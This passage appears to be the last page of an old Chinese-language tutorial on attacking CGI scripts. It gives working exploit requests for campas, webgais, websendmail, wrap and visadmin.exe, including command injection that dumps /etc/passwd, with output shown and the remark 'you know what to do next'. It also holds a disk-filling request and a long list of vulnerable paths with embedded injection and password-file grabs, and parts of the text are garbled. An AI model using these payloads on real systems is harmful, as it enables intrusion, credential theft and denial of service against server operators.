二十七.backdoor
看到现在一些cgichk.c里都有检查木马unlg1.1和rwwwshell.pl
前一个是UnlG写的,我没见过源码,有一个是THC写的,packetstorm里有它1.6版的源码.

二十八.visadmin.exe
http://omni.server/cgi-bin/visadmin.exe?user=guest
这个命令行将不停的向服务器的硬盘里写东西,知道写满为止.

二十九.campas
> telnet www.xxxx.net 80
Trying 200.xx.xx.xx...
Connected to venus.xxxx.net
Escape character is '^]'.
GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a
root:x:0:1:Super-User:/export/home/root:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
smtp:x:0:0:Mail Daemon User:/:/bin/false
.... 接下来你知道该干什么了吧 :P

三十.webgais
query=';mail+foo@somewhere.nettelnet target.machine.com 80
POST /cgi-bin/webgais HTTP/1.0
Content-length: 85 (replace this with the actual length of the "exploit"
line)
query=';mail+drazvan\@pop3.kappa.roparagraph
telnet target.machine.com 80
POST /cgi-bin/websendmail HTTP/1.0
Content-length: xxx (should be replaced with the actual length of the
string passed to the server, in this case xxx=90)
receiver=;mail+your_address\@somewhere.orgubject=a&content=a

三十一.wrap
http://sgi.victim/cgi-bin/wrap?/../../../../../etc
列出etc目录里的文件
下面是可能包含漏洞的所有CGI程序名,至于其他更多的漏洞,正在收集整理中,这里也衷心的希望得到你的批评与指教.
/cgi-bin/rwwwshell.pl
/cgi-bin/phf
/cgi-bin/Count.cgi
/cgi-bin/test.cgi
/cgi-bin/nph-test-cgi
/cgi-bin/nph-publish
/cgi-bin/php.cgi
/cgi-bin/handler
/cgi-bin/webgais
/cgi-bin/websendmail
/cgi-bin/webdist.cgi
/cgi-bin/faxsurvey
/cgi-bin/htmlscript /cgi-bin/pfdisplay.cgi
/cgi-bin/perl.exe
/cgi-bin/wwwboard.pl
/cgi-bin/www-sql
/cgi-bin/view-source
/cgi-bin/campas
/cgi-bin/aglimpse
/cgi-bin/glimpse
/cgi-bin/man.sh
/cgi-bin/AT-admin.cgi
/scripts/no-such-file.pl
/_vti_bin/shtml.dll
/_vti_inf.html
/_vti_pvt/administrators.pwd
/_vti_pvt/users.pwd
/msadc/Samples/SelectOR/showcode.asp
/scripts/iisadmin/ism.dll?http/dir
/adsamples/config/site.csc
/main.asp%81
/AdvWorks/equipment/catalog_type.asp?
/cgi-bin/input.bat?|dir..\..\windows
/index.asp::$DATA
/cgi-bin/visadmin.exe?user=guest
/?PageServices
/ss.cfg
/cgi-bin/get32.exe|echo%20>c:\file.txt
/cgi-bin/cachemgr.cgi
/cgi-bin/pfdispaly.cgi?/../../../../etc/motd
/domcfg.nsf /today.nsf
/names.nsf
/catalog.nsf
/log.nsf
/domlog.nsf
/cgi-bin/AT-generate.cgi
/secure/.wwwacl
/secure/.htaccess
/samples/search/webhits.exe
/scripts/srchadm/admin.idq
/cgi-bin/dumpenv.pl
adminlogin?RCpage=/sysadmin/index.stm /c:/program
/getdrvrs.exe
/test/test.cgi
/scripts/submit.cgi
/users/scripts/submit.cgi
/ncl_items.html?SUBJECT=2097 /cgi-bin/filemail.pl /cgi-bin/maillist.pl /cgi
-bin/jj
/cgi-bin/info2www
/cgi-bin/files.pl
/cgi-bin/finger
/cgi-bin/bnbform.cgi
/cgi-bin/survey.cgi
/cgi-bin/AnyForm2
/cgi-bin/textcounter.pl
/cgi-bin/classifieds.cgi
/cgi-bin/environ.cgi
/cgi-bin/wrap
/cgi-bin/cgiwrap
/cgi-bin/guestbook.cgi
/cgi-bin/edit.pl
/cgi-bin/perlshop.cgi
/_vti_inf.html
/_vti_pvt/service.pwd
/_vti_pvt/users.pwd
/_vti_pvt/authors.pwd
/_vti_pvt/administrators.pwd
/cgi-win/uploader.exe
/../../config.sys
/iisadmpwd/achg.htr
/iisadmpwd/aexp.htr
/iisadmpwd/aexp2.htr
/iisadmpwd/aexp4b.htr
/iisadmpwd/aexp4b.htr
cfdocs/expeval/ExprCalc.cfm?OpenFilePath=C:\WINNT\repair\sam._
/cfdocs/expeval/openfile.cfm
/cfdocs/expeval/openfile.cfm
/GetFile.cfm?FT=Text&FST=Plain&FilePath=C:\WINNT\repair\sam._
/CFIDE/Administrator/startstop.html
/cgi-bin/wwwboard.pl
/_vti_pvt/shtml.dll
/_vti_pvt/shtml.exe
/cgi-dos/args.bat
/cgi-win/uploader.exe
/cgi-bin/rguest.exe
/cgi-bin/wguest.exe
/scripts/issadmin/bdir.htr
/scripts/CGImail.exe
/scripts/tools/newdsn.exe
/scripts/fpcount.exe
/cfdocs/expelval/openfile.cfm
/cfdocs/expelval/exprcalc.cfm
/cfdocs/expelval/displayopenedfile.cfm
/cfdocs/expelval/sendmail.cfm
/iissamples/exair/howitworks/codebrws.asp
/iissamples/sdk/asp/docs/codebrws.asp
/msads/Samples/SelectOR/showcode.asp
/search97.vts
/carbo.dll
/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
/doc
/.html/............./config.sys
/....../

上一页  [1] [2] [3] [4]